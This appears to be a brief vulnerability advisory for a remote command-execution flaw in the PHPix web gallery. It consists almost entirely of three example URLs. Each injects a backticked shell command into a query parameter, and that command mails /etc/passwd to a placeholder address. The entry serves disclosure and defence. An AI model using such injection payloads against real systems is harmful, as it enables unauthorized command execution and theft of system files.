PHPix Remote Arbitrary Command Execution Vulnerability

PHPix Remote Arbitrary Command Execution Vulnerability

No exploit is required for this vulnerability. The following examples were provided:

http://www.example.com/phpix/index.phtml?mode=view&album=`cat%20/etc/passwd%20|%20mail%20someone@somewhere.com`&pic=A-10.jpg&dispsize=640&start=0

http://www.example.com/phpix/index.phtml?mode=view&album=Sample+Album&pic=A-10.jpg&dispsize=`cat%20/etc/passwd%20|%20mail%20someone@somewhere.com`&start=0

http://www.example.com/phpix/index.phtml?mode=view&album=Sample+Album&pic=`cat%20/etc/passwd%20|%20mail%20someone@somewhere.com`&dispsize=640&start=0